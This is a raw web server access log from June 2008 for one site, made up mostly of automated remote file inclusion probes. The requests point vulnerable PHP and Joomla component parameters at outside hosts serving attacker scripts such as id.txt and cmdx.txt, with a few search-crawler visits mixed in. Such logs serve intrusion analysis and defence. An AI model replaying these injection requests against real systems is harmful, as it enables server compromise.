202.57.1.181 - - [24/Jun/2008:09:34:41 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.57.1.181 - - [24/Jun/2008:09:34:42 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.89.22.121 - - [24/Jun/2008:09:34:52 -0700] "GET //?page=http://sucomais2.angelfire.com/safe.txt? HTTP/1.1" 500 374 "-" "libwww-perl/5.812" "www.dmulk.com"
72.29.73.67 - - [24/Jun/2008:09:35:00 -0700] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.117.241.196 - - [24/Jun/2008:09:35:01 -0700] "GET //modules/xfsection/modify.php?dir_module=http://zinero.no/virusteam/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.118.118.156 - - [24/Jun/2008:09:35:05 -0700] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.167.156.20 - - [24/Jun/2008:09:35:17 -0700] "GET /logs/access_071219.log//includes/messages.inc.php?include_path=http://www.com.ulaval.ca/st-hilaire/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.167.156.20 - - [24/Jun/2008:09:35:17 -0700] "GET //includes/messages.inc.php?include_path=http://www.com.ulaval.ca/st-hilaire/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.167.156.20 - - [24/Jun/2008:09:35:18 -0700] "GET /logs//includes/messages.inc.php?include_path=http://www.com.ulaval.ca/st-hilaire/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.29.73.67 - - [24/Jun/2008:09:35:23 -0700] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.249.73.161 - - [24/Jun/2008:09:35:25 -0700] "GET /logs/access_080507.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
87.118.118.156 - - [24/Jun/2008:09:35:39 -0700] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.20.138.101 - - [24/Jun/2008:09:37:24 -0700] "GET //includes/messages.inc.php?include_path=http://www.konkylie.no/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.252.3.200 - - [24/Jun/2008:09:37:35 -0700] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://4wdnews.com.au/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.252.3.200 - - [24/Jun/2008:09:37:36 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://4wdnews.com.au/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.251.172 - - [24/Jun/2008:09:38:49 -0700] "GET /upgrade_album.php?GALLERY_BASEDIR=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [24/Jun/2008:09:38:52 -0700] "GET /logs/upgrade_album.php?GALLERY_BASEDIR=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [24/Jun/2008:09:38:53 -0700] "GET /upgrade_album.php?GALLERY_BASEDIR=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.237.78.125 - - [24/Jun/2008:09:38:58 -0700] "GET /logs/access_080117.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.237.78.125 - - [24/Jun/2008:09:38:59 -0700] "GET /logs/access_080117.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.203.122.236 - - [24/Jun/2008:09:39:00 -0700] "GET /logs/access.log/administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://189.20.64.27/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.203.122.236 - - [24/Jun/2008:09:39:01 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://189.20.64.27/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.203.122.236 - - [24/Jun/2008:09:39:02 -0700] "GET /logs/administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://189.20.64.27/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.112.193.46 - - [24/Jun/2008:09:39:04 -0700] "GET //includes/messages.inc.php?include_path=http://www.konkylie.no/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.246.68.55 - - [24/Jun/2008:09:39:05 -0700] "GET //includes/messages.inc.php?include_path=http://travninni.se/poll/polldata/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
80.67.26.187 - - [24/Jun/2008:09:39:36 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.26.187 - - [24/Jun/2008:09:39:36 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.120.178 - - [24/Jun/2008:09:39:58 -0700] "GET /logs//gallery//update/update5.php?lang=http://www.foolishmovies.helloweb.eu/fastidio_id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [24/Jun/2008:09:39:58 -0700] "GET //gallery//update/update5.php?lang=http://www.foolishmovies.helloweb.eu/fastidio_id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.30.73.117 - - [24/Jun/2008:09:40:23 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.gg2003.de/phpBB2//language/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.243.44.3 - - [24/Jun/2008:09:40:47 -0700] "GET /logs/index.php?option=com_remository&Itemid=&mosConfig_absolute_path=http://www.geocities.com/lordscaby/irc/s.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
63.243.44.3 - - [24/Jun/2008:09:40:47 -0700] "GET /logs/index.php?option=com_remository&Itemid=&mosConfig_absolute_path=http://www.geocities.com/lordscaby/irc/t.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
63.243.44.3 - - [24/Jun/2008:09:41:01 -0700] "GET /index.php?option=com_remository&Itemid=&mosConfig_absolute_path=http://www.geocities.com/lordscaby/irc/s.txt?? HTTP/1.1" 500 374 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
63.243.44.3 - - [24/Jun/2008:09:41:04 -0700] "GET /index.php?option=com_remository&Itemid=&mosConfig_absolute_path=http://www.geocities.com/lordscaby/irc/t.txt?? HTTP/1.1" 500 374 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
87.118.118.156 - - [24/Jun/2008:09:41:13 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.120.178 - - [24/Jun/2008:09:41:16 -0700] "GET /logs/access_080218.log//gallery//update/update5.php?lang=http://www.foolishmovies.helloweb.eu/fastidio_id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [24/Jun/2008:09:41:16 -0700] "GET //gallery//update/update5.php?lang=http://www.foolishmovies.helloweb.eu/fastidio_id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [24/Jun/2008:09:41:17 -0700] "GET /logs//gallery//update/update5.php?lang=http://www.foolishmovies.helloweb.eu/fastidio_id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [24/Jun/2008:09:41:18 -0700] "GET /logs/access_080201.log//gallery//update/update5.php?lang=http://www.foolishmovies.helloweb.eu/fastidio_id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.167.156.20 - - [24/Jun/2008:09:41:28 -0700] "GET /logs//includes/messages.inc.php?include_path=http://www.com.ulaval.ca/st-hilaire/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.167.156.20 - - [24/Jun/2008:09:41:28 -0700] "GET //includes/messages.inc.php?include_path=http://www.com.ulaval.ca/st-hilaire/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
88.158.0.5 - - [24/Jun/2008:09:41:29 -0700] "GET /logs/access_080127.log//vwar/convert/mvcw.php?step=1&vwar_root=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.158.0.5 - - [24/Jun/2008:09:41:29 -0700] "GET /logs/access_080127.log//vwar/convert/mvcw.php?step=1&vwar_root=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.203.122.236 - - [24/Jun/2008:09:41:54 -0700] "GET /logs/access_080105.log/administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://189.20.64.27/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.30.73.117 - - [24/Jun/2008:09:41:57 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.gg2003.de/phpBB2//language/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.120.178 - - [24/Jun/2008:09:42:31 -0700] "GET //gallery//update/update5.php?lang=http://www.foolishmovies.helloweb.eu/fastidio_id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.94.120.198 - - [24/Jun/2008:09:43:15 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.120.198 - - [24/Jun/2008:09:43:15 -0700] "GET //index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.120.198 - - [24/Jun/2008:09:43:15 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.34.140.215 - - [24/Jun/2008:09:43:16 -0700] "GET /logs/upgrade_album.php?GALLERY_BASEDIR=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.34.140.215 - - [24/Jun/2008:09:43:17 -0700] "GET /upgrade_album.php?GALLERY_BASEDIR=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.111.176.84 - - [24/Jun/2008:09:43:41 -0700] "GET /logs/index.php?nuseo_dir=http://fan.sleepsycho.com/bajocdm2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
163.30.131.2 - - [24/Jun/2008:09:43:44 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://skill-station.net/help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
163.30.131.2 - - [24/Jun/2008:09:43:44 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://skill-station.net/help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
163.30.131.2 - - [24/Jun/2008:09:43:45 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://skill-station.net/help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.246.252.46 - - [24/Jun/2008:09:43:47 -0700] "GET //index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.79" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:09:43:50 -0700] "GET /logs/access_080225.log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:09:43:50 -0700] "GET /logs/access_080225.log/components/com_performs/performs.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:09:43:51 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:09:43:51 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:09:43:52 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:09:43:52 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.220.139.98 - - [24/Jun/2008:09:43:55 -0700] "GET /index.php?path=http://www.spsss.ru/exhibition/mc?? HTTP/1.1" 500 374 "-" "libwww-perl/5.79" "www.dmulk.com"
212.220.139.98 - - [24/Jun/2008:09:43:55 -0700] "GET /index.php?path=http://www.spsss.ru/exhibition/mc?? HTTP/1.1" 500 374 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.176.84 - - [24/Jun/2008:09:44:03 -0700] "GET /index.php?nuseo_dir=http://fan.sleepsycho.com/bajocdm2.txt????? HTTP/1.1" 500 374 "-" "libwww-perl/5.805" "www.dmulk.com"
195.47.9.2 - - [24/Jun/2008:09:44:18 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.47.9.2 - - [24/Jun/2008:09:44:18 -0700] "GET //index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
195.47.9.2 - - [24/Jun/2008:09:44:18 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.78.110.72 - - [24/Jun/2008:09:44:41 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://skill-station.net/help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.55.211.39 - - [24/Jun/2008:09:44:44 -0700] "GET /retreat1/?D=D HTTP/1.1" 200 15081 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
203.78.110.72 - - [24/Jun/2008:09:44:46 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://skill-station.net/help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.78.110.72 - - [24/Jun/2008:09:44:50 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://skill-station.net/help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.203.122.236 - - [24/Jun/2008:09:44:57 -0700] "GET /logs//components/com_mosmedia/media.tab.php?mosConfig_absolute_path=http://189.20.64.27/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.203.122.236 - - [24/Jun/2008:09:44:59 -0700] "GET //components/com_mosmedia/media.tab.php?mosConfig_absolute_path=http://189.20.64.27/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.25.34 - - [24/Jun/2008:09:45:03 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://thepornhandbook.com/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.53.25.34 - - [24/Jun/2008:09:45:03 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://thepornhandbook.com/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.120.178 - - [24/Jun/2008:09:45:16 -0700] "GET /logs/access.log//components/com_simpleboard/file_upload.php?sbp=http://www.foolishmovies.helloweb.eu/fastidio_id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [24/Jun/2008:09:45:16 -0700] "GET //components/com_simpleboard/file_upload.php?sbp=http://www.foolishmovies.helloweb.eu/fastidio_id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [24/Jun/2008:09:45:17 -0700] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://www.foolishmovies.helloweb.eu/fastidio_id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
92.51.131.109 - - [24/Jun/2008:09:45:19 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
92.51.131.109 - - [24/Jun/2008:09:45:20 -0700] "GET //index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.803" "www.dmulk.com"
92.51.131.109 - - [24/Jun/2008:09:45:21 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.117.241.196 - - [24/Jun/2008:09:46:55 -0700] "GET /logs/access_080117.log//modules/xfsection/modify.php?dir_module=http://zinero.no/virusteam/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.117.241.196 - - [24/Jun/2008:09:46:55 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://zinero.no/virusteam/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.194.70.92 - - [24/Jun/2008:09:47:40 -0700] "GET /logs/access.log//index.php3?s=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.70.92 - - [24/Jun/2008:09:47:40 -0700] "GET /logs//index.php3?s=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.70.92 - - [24/Jun/2008:09:47:40 -0700] "GET //index.php3?s=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.91.166 - - [24/Jun/2008:09:47:49 -0700] "GET /logs/access.log//index.php3?s=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.91.166 - - [24/Jun/2008:09:47:49 -0700] "GET /logs//index.php3?s=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.91.166 - - [24/Jun/2008:09:47:49 -0700] "GET //index.php3?s=http://dj.caucasus.net/V2008ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.56.172.161 - - [24/Jun/2008:09:48:14 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.56.172.161 - - [24/Jun/2008:09:48:15 -0700] "GET //index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
195.56.172.161 - - [24/Jun/2008:09:48:15 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.229.49.192 - - [24/Jun/2008:09:48:43 -0700] "GET //index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.79" "www.dmulk.com"
69.89.22.121 - - [24/Jun/2008:09:49:24 -0700] "GET /logs/access_080312.log/!scanhttp://sucomais2.angelfire.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.121 - - [24/Jun/2008:09:49:24 -0700] "GET /logs/!scanhttp://sucomais2.angelfire.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.118.118.156 - - [24/Jun/2008:09:49:25 -0700] "GET /logs/access_071216.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.118.118.156 - - [24/Jun/2008:09:49:26 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.118.118.156 - - [24/Jun/2008:09:49:30 -0700] "GET /logs/access_071212.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.220.139.98 - - [24/Jun/2008:09:49:31 -0700] "GET /logs/access_080215.log/index.php?docroot=http://www.spsss.ru/exhibition/mc?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.220.139.98 - - [24/Jun/2008:09:49:31 -0700] "GET /logs/access_080215.log/index.php?docroot=http://www.spsss.ru/exhibition/mc?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.8.106.125 - - [24/Jun/2008:09:49:35 -0700] "GET //index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.79" "www.dmulk.com"
87.118.118.156 - - [24/Jun/2008:09:49:47 -0700] "GET /avatar.php?page=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.65.147.154 - - [24/Jun/2008:09:49:48 -0700] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://crashoveride.altervista.org/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.65.147.154 - - [24/Jun/2008:09:49:48 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://crashoveride.altervista.org/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.65.147.154 - - [24/Jun/2008:09:49:48 -0700] "GET /logs/access_080105.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://crashoveride.altervista.org/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.65.147.154 - - [24/Jun/2008:09:49:48 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://crashoveride.altervista.org/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.148.95.147 - - [24/Jun/2008:09:50:06 -0700] "GET /avatar.php?page=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.6.22.157 - - [24/Jun/2008:09:51:00 -0700] "GET /bikes/GPS/WeSTOC2008/?S=A HTTP/1.0" 200 842 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.118.118.156 - - [24/Jun/2008:09:51:01 -0700] "GET //modules/xfsection/modify.php?dir_module=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.8.106.125 - - [24/Jun/2008:09:51:03 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.8.106.125 - - [24/Jun/2008:09:51:04 -0700] "GET //index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.79" "www.dmulk.com"
